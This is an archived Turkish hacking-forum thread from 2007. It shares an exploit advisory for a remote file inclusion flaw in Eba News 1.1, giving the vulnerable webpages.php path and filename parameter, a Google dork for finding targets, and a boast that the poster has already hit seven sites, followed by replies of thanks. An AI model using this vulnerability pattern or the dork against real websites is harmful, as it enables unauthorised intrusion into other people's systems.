PDA

Orijinalini görmek için tıklayınız

eXTReMe Tracker
: Eba News Version 1.1


SekoMirza
04-20-2007, 07:15 PM
Arkadaşlar yarım saat önce benim tarafımdan bulunmuş bir bugdır ilk 7 sitede 7 yaptım gerisi size kalmış ;)

Kaynak : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

--------------------------------------------------
Eba News Version : v1.1 <= (webpages.php) Remote File Include
--------------------------------------------------

Author : SekoMirza
Date Found : Nisan 11 2007
Location : Fransa // ...
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Eba News
version : 1.1
vendor : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
source url : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
--------------------------------------------------

Description:
~~~~~~~~

EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.

--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in admin/public/webpages.php

Proof Of Concept:
~~~~~~~~~~~~

eba/admin/public/webpages.php?filename=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

--------------------------------------------------

google d0rk:
~~~~~~~
"Eba News"

--------------------------------------------------
Solution:
~~~
- download new version in vendor URL

--------------------------------------------------
Shoutz:
~~
~ My Sweet -> Caramel
~ For Mp3s -> Hypn0sis
~ For Support -> Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
~ My Bro -> PhantomOrchid
~ My Preceptor -> Earnk Kazno

--------------------------------------------------

Contact:
~~~

Seko[at]se-ko[dot]info

-------------------------------- [ EOF ]----------

Sorusu Olanlar Buraya Yazarsa Elimden Geldiğince Yardımcı Olmaya Çalışırım!

Phantom Orchid
04-20-2007, 07:16 PM
Tebrikler.. :)

WebLOADER
04-20-2007, 07:17 PM
Tebrik ederim seko..Çok başarılısınız ;)

SekoMirza
04-20-2007, 07:17 PM
Tebrikler.. :)

Teşekkürler Metinim :)
Tebrik ederim seko..Çok başarılısınız

Teşekkürler Madworm.

hayalet_kral
04-20-2007, 07:53 PM
çok sağol emeğe saygı

HaCKeW
04-20-2007, 09:37 PM
teşekkürler sağol

ozancem
04-20-2007, 09:41 PM
teşekkürler!

danger32
04-21-2007, 02:57 PM
sağol kardes guzel paylasım

HaCKeW
04-21-2007, 06:25 PM
sağol bi bakalım

TR-ShaRk
04-21-2007, 06:35 PM
ellerine saglik sekomirza

FaTaLiST
04-21-2007, 06:47 PM
tebrikler seko ve phantom Gerçekten Çok Başarılısınız ;)

SekoMirza
04-21-2007, 07:26 PM
Sağolun Arkadaşlar ...

Dark_PLaCes
04-28-2007, 04:07 AM
Ellerine Sağlık :D

klineci
09-12-2007, 07:51 PM
çok sağol

restartion_ctr
01-19-2008, 04:08 AM
Teşekkürler

c0ld-b0mb3r
01-19-2008, 08:52 AM
sağol bilader